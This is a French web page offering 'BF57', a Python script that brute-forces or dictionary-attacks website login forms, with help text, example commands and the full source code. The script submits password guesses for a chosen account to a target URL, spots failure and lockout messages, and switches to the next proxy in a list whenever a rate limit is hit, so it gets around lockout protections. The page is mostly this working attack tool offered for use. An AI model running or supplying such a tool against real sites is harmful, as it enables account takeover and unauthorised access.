N'hésitez pas à remplir le formulaire pour nous contacter par courriel. Tous les champs sont obligatoires.

Votre nom ou pseudo

Votre adresse e-mail (facultatif)


Contenu de votre message


Entrez le code de validation    2WUV2


BF57 Brute Force Web

BF57 permet d'effectué une attaque en force brute avec ou sans dictionnaire.

Exemple de commande:

$ ./bf57 -a http://www.site.truc 8 admin 'login' 'password' 'mot de passe incorrect' 'limite de connexion'

Help:

$ ./bf57 -h
BF57 Brute Force Generator
GNU/GPL v3
BF57 allows a website to attack by brute force or dictionary
Create by Be Human (craft@ckdevelop.org) Options:
    Help: bf57 -h or --help
    Functions:
        letters: bf47 -l or --letters [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        numerics: bf47 -n or --numerics [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        letters and digits: bf47 -ld [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        punctuation: bf47 -p or --punctuation [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        all : bf47 -a or --all [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        manual : bf47 -m or --manual [url] [number] [login] [input login] [input password] [error msg] [limit msg] [strings]
        dictionnary : bf47 -d or --dico [url] [dico] [login] [input login] [input password] [error msg] [limit msg]
    Option:
        use list proxy: bf57 -p or --proxy [file] [loops]
            
    Examples:
        without proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!"
        manual: bf57 -m http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" "azerty"
        with dico: bf57 -d http://site.truc "admin" "log" "pwd" "error!!" "limit!!" ./dico.list
        with proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" -p ./proxy.list 3

#!/usr/bin/env python 
#-*- coding:utf-8 -*- 

import urllib, urllib2, string, sys, os 

intro="""BF57 Brute Force Generator 
GNU/GPL v3 
BF57 allows a website to attack by brute force or dictionary 
Create by Be Human (craft at ckdeveloporg)""" 

class BF57(): 
    def __init__(self): 
        if (len(sys.argv) < 9): 
            if (len(sys.argv) < 2): 
                print("\n[!]Mauvais nombre d\'arguments[!]\n") 
                self.help() 
            else: 
                if sys.argv[1] == "-h" or sys.argv[1] == "--help": 
                    self.help() 
                else: 
                    print("\n[!]Mauvais nombre d\'arguments[!]\n") 
                    self.help() 
        else: 
            #white=string.whitespace 
            white=' ' 
            letters=string.letters 
            digits=string.digits 
            puncts=string.punctuation 
            specs=u"àâäéèêëîïôöûüùçÀÂÄÉÈÊËÎÏÔÖÙÇ" 
            self.url=sys.argv[2] 
            self.cnt=0 
            self.manu=False 
            if sys.argv[1] == "-l" or sys.argv[1] == "--letters": 
                self.dico="%s%s%s"%( letters, specs, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-n" or sys.argv[1] == "--numerics": 
                self.dico="%s%s"%( digits, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-ld": 
                self.dico="%s%s%s%s"%( letters, specs, digits, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-p" or sys.argv[1] == "--punctuation": 
                dico="%s%s"%( puncts, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-a" or sys.argv[1] == "--all": 
                self.dico="%s%s%s%s%s"%( letters, specs, digits, puncts, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-m" or sys.argv[1] == "--manual": 
                self.manu=True 
                self.dico=sys.argv[7] 
                self.BruteForce() 
            elif sys.argv[1] == "-d" or sys.argv[1] == "--dico": 
                self.DicoAttack() 
                 
            else: 
                print("\n[!]Option inconnu[!]\n") 
                self.help() 

    def DicoAttack(self): 
        self.fdico = open(sys.argv[8],'r') 
        #self.dictionary=[] 
        self.useproxy=False 
        if (len(sys.argv) > 9): 
            if sys.argv[9] == "-p" or sys.argv[9] == "--proxy": 
                self.useproxy=True 
                listproxy=sys.argv[10] 
            if self.useproxy: 
                fproxy = open(listproxy,'r') 
                self.adrproxy=[] 
                self.cptproxy=0 
                for lines in fproxy: 
                    self.adrproxy.append(lines.strip('\n')) 
        self.login=sys.argv[3] 
        self.ilogin=sys.argv[4] 
        self.ipwd=sys.argv[5] 
        self.merror=sys.argv[6] 
        self.mlimit=sys.argv[7] 
        for lines in self.fdico: 
            self.data = {self.ilogin: self.login,self.ipwd: lines.strip('\n')} 
            self.request = urllib2.Request(self.url, urllib.urlencode(self.data)) 
            if self.useproxy: 
                proxy = { 'http' : self.adrproxy[self.cptproxy] } 
                proxy_handler = urllib2.ProxyHandler(proxy) 
                opener = urllib2.build_opener(proxy_handler) 
                attack = opener.open(self.request).read() 
            else: 
                attack = urllib2.urlopen(self.request).read() 
            if self.mlimit in attack: 
                print("Limit") 
                self.cptproxy+=1 
                if self.cptproxy > len(self.adrproxy): 
                    self.cptproxy=0 
            elif self.merror in attack: 
                print(lines.strip('\n')) 
            else: 
                if lines.strip('\n').strip(' ') == '': 
                    pass 
                else: 
                    print("Password: "+lines.strip('\n')) 
                    #self.dictionary.append(lines.strip('\n')) 
                    break 


    def BruteForce(self): 
        maxlen=int(sys.argv[3])+1 
        self.useproxy=False 
        if (len(sys.argv) > 9): 
            if self.manu: 
                if sys.argv[10] == "-p" or sys.argv[10] == "--proxy": 
                    self.useproxy=True 
                    listproxy=sys.argv[11] 
            else: 
                if sys.argv[9] == "-p" or sys.argv[9] == "--proxy": 
                    self.useproxy=True 
                    listproxy=sys.argv[10] 
            if self.useproxy: 
                fproxy = open(listproxy,'r') 
                self.adrproxy=[] 
                self.cptproxy=0 
                for lines in fproxy: 
                    self.adrproxy.append(lines.strip('\n')) 
                     
        self.login=sys.argv[4] 
        self.ilogin=sys.argv[5] 
        self.ipwd=sys.argv[6] 
        self.merror=sys.argv[7] 
        self.mlimit=sys.argv[8] 
         
        for a in range(maxlen): 
            self.allkey('',a) 
             
    def allkey(self, chaine, maxlen): 
        if len(chaine) < maxlen: 
            for b in range(len(self.dico)): 
                self.allkey(chaine+self.dico[b], maxlen) 
        else: 
            if len(chaine) == maxlen: 
                self.data = {self.ilogin: self.login,self.ipwd: chaine} 
                self.request = urllib2.Request(self.url, urllib.urlencode(self.data)) 
                self.pOut(chaine) 
         
    def pOut(self, chaine): 
        self.cnt+=1 
        if self.useproxy: 
            proxy = { 'http' : self.adrproxy[self.cptproxy] } 
            proxy_handler = urllib2.ProxyHandler(proxy) 
            opener = urllib2.build_opener(proxy_handler) 
            attack = opener.open(self.request).read() 
        else: 
            attack = urllib2.urlopen(self.request).read() 
        if self.mlimit in attack: 
            print("Limit") 
            self.cptproxy+=1 
            if self.cptproxy > len(self.adrproxy): 
                self.cptproxy=0 
        elif self.merror in attack: 
            print(chaine) 
        else: 
            print("Password: "+chaine) 
         
    def help(self): 
        print(intro+"""\n\nOptions: 
    Help: bf57 -h or --help 
    Functions: 
        letters: bf47 -l or --letters [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        numerics: bf47 -n or --numerics [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        letters and digits: bf47 -ld [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        punctuation: bf47 -p or --punctuation [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        all : bf47 -a or --all [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        manual : bf47 -m or --manual [url] [number] [login] [input login] [input password] [error msg] [limit msg] [strings] 
        dictionnary : bf47 -d or --dico [url] [dico] [login] [input login] [input password] [error msg] [limit msg] 
    Option: 
        use list proxy: bf57 -p or --proxy [file] [loops] 
             
    Examples: 
        without proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" 
        manual: bf57 -m http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" "azerty" 
        with dico: bf57 -d http://site.truc "admin" "log" "pwd" "error!!" "limit!!" ./dico.list 
        with proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" -p ./proxy.list 3\n""") 
         
BF57()

 

 

 

Écrire un commentaire


Capcha
Entrez le code de l'image dfnrj